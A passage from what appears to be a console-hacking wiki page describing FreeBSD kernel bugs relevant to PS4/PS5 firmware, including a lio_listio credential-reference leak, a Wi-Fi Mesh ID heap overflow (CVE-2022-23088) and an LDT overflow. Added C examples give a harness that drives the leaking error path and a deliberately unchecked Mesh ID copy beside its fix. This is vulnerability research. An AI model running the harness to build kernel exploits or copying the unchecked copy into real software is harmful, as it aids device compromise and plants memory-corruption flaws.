  • EINVAL mode is invalid, or n exceeds the limit AIO_LISTIO_MAX.
  • EIO One or more of the operations specified by aiocb_list failed. The application can check the status of each operation using aio_return(3).

If lio_listio() fails with the error EAGAIN, EINTR, or EIO, then some of the operations in aiocb_list may have been initiated. If lio_listio() fails for any other reason, then none of the I/O operations has been initiated.

This means that EAGAIN, EINTR, or EIO are the errors worth watching for to obtain a reference count leak. EIO in particular is what kern_lio_listio() returns to userland when one or more of the individual aio_aqueue() calls failed, and every such failure that went through err4 is one leaked credential reference.
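As an added example (not from Chris J-D's writeup nor from the wiki's own code), the following C harness implements the fuzzing idea above on the userland side: it builds an aiocb list of alternating LIO_READ/LIO_WRITE jobs with SIGEV_NONE notification (path A1), submits it with lio_listio(LIO_NOWAIT) against the two ends of a pipe (a non-vnode descriptor, path B1.2), and tallies the errno the syscall returns. Each failed job is one candidate leaked reference; the harness only counts errors and does not attempt the overflow. The lio_listio() call itself is compiled only on FreeBSD so the list-building and classification code builds elsewhere; the names build_job_list, leaves_jobs_initiated and lio_round are this example's own.

```c
/* Added example (not from the writeup or the wiki): userland harness that
 * submits LIO_READ/LIO_WRITE jobs via lio_listio(LIO_NOWAIT) and tallies the
 * errno returned, which is the observable side of aio_aqueue() failing.
 * Target is FreeBSD; on other systems lio_round() reports ENOSYS. */
#include <aio.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NJOBS 16

/* Fill `jobs` and the pointer list the kernel copies in. Even slots read from
 * read_fd, odd slots write to write_fd. aio_offset is 0 (non-negative, so the
 * VCHR/offset check passes on any file type) and SIGEV_NONE keeps us on path
 * A1 (no kqueue registration). Returns the number of non-NULL list entries. */
int build_job_list(struct aiocb *jobs, struct aiocb **list, int n,
                   int read_fd, int write_fd, char *scratch, size_t scratch_len) {
    int filled = 0;
    for (int i = 0; i < n; i++) {
        memset(&jobs[i], 0, sizeof jobs[i]);
        jobs[i].aio_fildes = (i & 1) ? write_fd : read_fd;
        jobs[i].aio_lio_opcode = (i & 1) ? LIO_WRITE : LIO_READ;
        jobs[i].aio_buf = scratch;
        jobs[i].aio_nbytes = scratch_len;
        jobs[i].aio_offset = 0;
        jobs[i].aio_sigevent.sigev_notify = SIGEV_NONE;
        list[i] = &jobs[i];
        filled++;
    }
    return filled;
}

/* lio_listio(3) documents EAGAIN, EINTR and EIO as the errors after which some
 * jobs may already have been initiated; anything else means none were. */
int leaves_jobs_initiated(int err) {
    return err == EAGAIN || err == EINTR || err == EIO;
}

/* One syscall round. Returns 0 on success, otherwise the errno value. */
int lio_round(struct aiocb **list, int n) {
#ifdef __FreeBSD__
    if (lio_listio(LIO_NOWAIT, list, n, NULL) == 0)
        return 0;
    return errno;
#else
    (void)list; (void)n;
    return ENOSYS;                       /* harness target is FreeBSD */
#endif
}

int main(void) {
    struct aiocb jobs[NJOBS];
    struct aiocb *list[NJOBS];
    char scratch[64];
    int pipefd[2];
    int tally[5] = {0};                  /* ok, EIO, EAGAIN, EINVAL, other */

    if (pipe(pipefd) != 0) return 1;     /* pipe: f_type != DTYPE_VNODE */
    build_job_list(jobs, list, NJOBS, pipefd[0], pipefd[1], scratch, sizeof scratch);

    for (int round = 0; round < 1000; round++) {
        int err = lio_round(list, NJOBS);
        if (err == 0) tally[0]++;
        else if (err == EIO) tally[1]++;
        else if (err == EAGAIN) tally[2]++;
        else if (err == EINVAL) tally[3]++;
        else tally[4]++;
    }
    printf("ok=%d EIO=%d EAGAIN=%d EINVAL=%d other=%d\n",
           tally[0], tally[1], tally[2], tally[3], tally[4]);
    return 0;
}
```

A round that returns EIO means at least one of the NJOBS aio_aqueue() calls failed; a round that returns EINVAL means the list never got past argument validation and is not interesting for the leak.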

Patched[edit | edit source]

Maybe (but the bug was also maybe never introduced on PS4).


FW <=?9.xx? - IEEE 802.11 Wi-Fi heap buffer overflow (CVE-2022-23088)[edit | edit source]

Credits[edit | edit source]

  • m00nbsd working with Trend Micro Zero Day Initiative for discovering the vulnerability and reporting it to FreeBSD (2022-04-05)

Analysis[edit | edit source]

Bug Description[edit | edit source]

FreeBSD's net80211 kernel subsystem provides infrastructure and drivers for IEEE 802.11 wireless (Wi-Fi) communications. The 802.11 beacon handling routine failed to validate the length of an IEEE 802.11s Mesh ID before copying it to a heap-allocated buffer. While a FreeBSD Wi-Fi client is in scanning mode (i.e., not associated with a SSID) a malicious beacon frame may overwrite kernel memory, leading to remote code execution.
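As an added example (not net80211's code), the following C walker shows the shape of the bug and of its fix: an information-element parser that copies the 802.11s Mesh ID (element ID 114) into a node's 32-byte field, once trusting the element's length byte and once bounding it against the field size. The beacon bytes are constructed here, and the names find_ie, copy_meshid_unchecked, copy_meshid_checked, build_beacon_ies and unchecked_clobbers_canary are this example's own. The unchecked variant is run against a padded arena with a canary so the overrun is measurable without undefined behaviour.

```c
/* Added example (not FreeBSD's net80211 code): beacon IE walker extracting the
 * Mesh ID into a fixed 32-byte field, unchecked (CVE-2022-23088 shape) and
 * checked. Frame bytes are constructed for the demonstration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define IEEE80211_ELEMID_MESHID 114   /* Mesh ID element, IEEE 802.11s */
#define IEEE80211_MESHID_LEN    32

/* Locate an element by ID in a TLV list; returns a pointer to its length byte
 * or NULL. Truncated elements are rejected so the walker cannot over-read. */
const uint8_t *find_ie(const uint8_t *ies, size_t len, uint8_t id) {
    size_t off = 0;
    while (off + 2 <= len) {
        uint8_t eid = ies[off], elen = ies[off + 1];
        if (off + 2 + elen > len) return NULL;      /* truncated element */
        if (eid == id) return &ies[off + 1];
        off += 2 + (size_t)elen;
    }
    return NULL;
}

/* Unchecked copy: trusts the attacker-controlled length byte. `dst` is meant
 * to be the node's IEEE80211_MESHID_LEN-byte field. Returns bytes written. */
size_t copy_meshid_unchecked(uint8_t *dst, const uint8_t *ies, size_t len) {
    const uint8_t *ie = find_ie(ies, len, IEEE80211_ELEMID_MESHID);
    if (ie == NULL) return 0;
    memcpy(dst, ie + 1, ie[0]);                     /* ie[0] may exceed 32 */
    return ie[0];
}

/* Checked copy: validate the element length against the field size first.
 * Returns bytes written, 0 if absent, or -1 if the frame is rejected. */
int copy_meshid_checked(uint8_t *dst, const uint8_t *ies, size_t len) {
    const uint8_t *ie = find_ie(ies, len, IEEE80211_ELEMID_MESHID);
    if (ie == NULL) return 0;
    if (ie[0] > IEEE80211_MESHID_LEN) return -1;   /* oversized Mesh ID */
    memcpy(dst, ie + 1, ie[0]);
    return ie[0];
}

/* Constructed beacon IE list: an SSID element (ID 0) followed by a Mesh ID of
 * `meshid_len` bytes of 'M'. Returns the total length written, 0 if `cap`
 * is too small. */
size_t build_beacon_ies(uint8_t *out, size_t cap, uint8_t meshid_len) {
    static const uint8_t ssid_ie[] = { 0, 4, 'm', 'e', 's', 'h' };
    size_t n = sizeof ssid_ie + 2 + (size_t)meshid_len;
    if (n > cap) return 0;
    memcpy(out, ssid_ie, sizeof ssid_ie);
    out[sizeof ssid_ie] = IEEE80211_ELEMID_MESHID;
    out[sizeof ssid_ie + 1] = meshid_len;
    memset(out + sizeof ssid_ie + 2, 'M', meshid_len);
    return n;
}

/* Measure the overrun without undefined behaviour: the 32-byte field is the
 * start of a larger arena whose remainder is a 0xAA canary. Returns how many
 * canary bytes the unchecked copy clobbered. */
size_t unchecked_clobbers_canary(uint8_t meshid_len) {
    uint8_t frame[272];                              /* fits a 255-byte element */
    uint8_t arena[IEEE80211_MESHID_LEN + 256];       /* field + canary */
    size_t n = build_beacon_ies(frame, sizeof frame, meshid_len);
    memset(arena, 0xAA, sizeof arena);
    copy_meshid_unchecked(arena, frame, n);
    size_t clobbered = 0;
    for (size_t i = IEEE80211_MESHID_LEN; i < sizeof arena; i++)
        if (arena[i] != 0xAA) clobbered++;
    return clobbered;
}
```

A 40-byte Mesh ID clobbers 8 bytes past the field in the unchecked variant and is dropped by the checked one; a frame whose Mesh ID element claims more bytes than remain is rejected by the walker itself before any copy.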

Exploit Implementation[edit | edit source]

Patched[edit | edit source]

Maybe in PS4 9.xx and PS5 5.xx.


Not investigated[edit | edit source]

IPv6 fragmentation and ICMP/ICMP6 packet filter bypass vulnerability in OpenBSD Packet Filter (CVE-2019-5597, CVE-2019-5598)[edit | edit source]

These vulnerabilities may be related to the other IPv6 vulnerabilities exploited successfully on PS4 and PS5. See Vulnerabilities.

It may also be related to CVE-2018-4407, which affects Apple XNU.

Denial-of-Service only[edit | edit source]

CVE-2022-23093[edit | edit source]

PS4 DevKit Specific Bugs[edit | edit source]

6.20+ DevKit Specific Bug[edit | edit source]

The Development Kit comes with breakpoint feature that can pause the execution of an application program when the application program accesses a certain location in memory. This data breakpoint is only triggered when an application program accesses memory, but, because of a bug that occurred in version 6.00 of the system software, such breakpoints may be triggered when the kernel accesses the memory of an application program. When this happens, the PlayStation 4 system determines that a serious error has occurred and automatically shuts down the Development Kit.

6.50 DevKit Specific Bug[edit | edit source]

This bug occurs regardless of the method used to set the data breakpoint (occurring both when a breakpoint is set with the host tool and when it is set with the sceDbgSetHardwareBreakPoint() API). Version 6.50 of the system software will be fixed so that data breakpoints are not triggered when the kernel accesses an application program's memory (thus returning to the behavior of versions of the system software prior to version 6.00).

Not exploitable because 32-bit compatibility syscalls not enabled[edit | edit source]

FW <= ?4.05? - amd64_set_ldt Heap Overflow (CVE-2016-1885)[edit | edit source]

Credits[edit | edit source]

  • 2016-10-25 This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team
  • 2016-10-25 Revised patch to address a problem pointed out by ahaha from Chaitin Tech.

Analysis[edit | edit source]

Bug Description[edit | edit source]

The IA-32 architecture allows programs to define segments, which provide a based and size-limited view into the program address space. The memory-resident processor structure called the Local Descriptor Table, usually abbreviated LDT, contains the definitions of the segments. Since incorrect or malicious segments would breach system integrity, operating systems do not give processes direct access to the LDT; instead they provide system calls that allow controlled installation and removal of segments.

A special combination of sysarch(2) arguments specifies a request to uninstall a set of descriptors from the LDT: the start descriptor and the number of descriptors to clear are provided. Due to insufficient bounds checking during argument validation, unbounded zeroing of the process LDT and adjacent memory can be initiated from usermode.

sysarch is syscall #165 on FreeBSD 9.1 and on PS4. Sony removed set_ldt between System Software version 1.76 and 4.05, according to Red-EyeX32.

Exploit Implementation[edit | edit source]

Patched[edit | edit source]

Yes: set_ldt was removed in some FW between 2.00 and 4.05. The PS4 may also not be vulnerable because of a possible lack of a 32-bit implementation of the syscalls.

Tested[edit | edit source]

No.


Reference sites[edit | edit source]